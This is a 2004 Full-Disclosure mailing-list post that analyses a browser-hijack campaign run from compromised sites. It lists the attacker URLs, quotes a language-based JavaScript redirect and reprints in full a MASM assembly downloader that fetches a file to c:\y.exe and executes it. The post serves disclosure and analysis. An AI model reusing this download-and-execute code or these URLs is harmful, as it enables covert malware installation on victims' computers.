[Full-Disclosure] browser hijack by apache sites

[thijs at dalhuijsen.com (Matthijs Dalhuijsen)]

On 24-mei-04, at 14:46, Feher Tamas wrote:

>> http://www.b00gle.com/fa/?d=get

good thing the internet has a memory :)
http://216.239.59.104/search?q=cache:yYCmQqdLUvMJ:www.b00gle.com/fa/ 
%3Fd%3Dget+&hl=en
http://www.google.com/search?q=cache:iyMDunIkp08J:www.b00gle.com/fa/ 
tool.html+&hl=en


http://www.pizdato.biz/acc1/ to http://www.pizdato.biz/acc9/ show the  
same files, as if copied in a for loop

i especially liked 2 files in the dir; counter.htm containing the  
extremely funny
<script language="JavaScript">
<!--
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "home.html";
//-->
</script>






but then i saw this:  
http://www.pizdato.biz/acc10/2DimensionOfExploits.asm
Hehehe, Open Source is getting big!, didnt see no GPL licence so i hope  
im not Violating someones copyright by posting this here,....

.386

.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

	szLibrary db "urlmon.dll",0
	szFunction db "URLDownloadToFileA",0

	szFileName db "c:\y.exe", 0

.code
start:

	invoke GetCommandLineA

	add	ax,	0Ah
	lea	ecx,	[eax]
	push	ecx

	invoke LoadLibrary, addr szLibrary
	invoke GetProcAddress, eax, addr szFunction

	pop	ecx
	push	0
	push	0
	lea 	ebx,	[szFileName]
	push	ebx
	push	ecx
	push	0
	call	eax

	invoke WinExec, addr szFileName, 1
	invoke ExitProcess, NULL

end start



Yet i do feel a bit suspicious about this set of files;,... bit TOO  
educating i think ;)

cheers!

thijs
--

If i had 6 hours to chop down a tree, I'd spend the first four  
sharpening the axe.
                                        -- Abraham Lincoln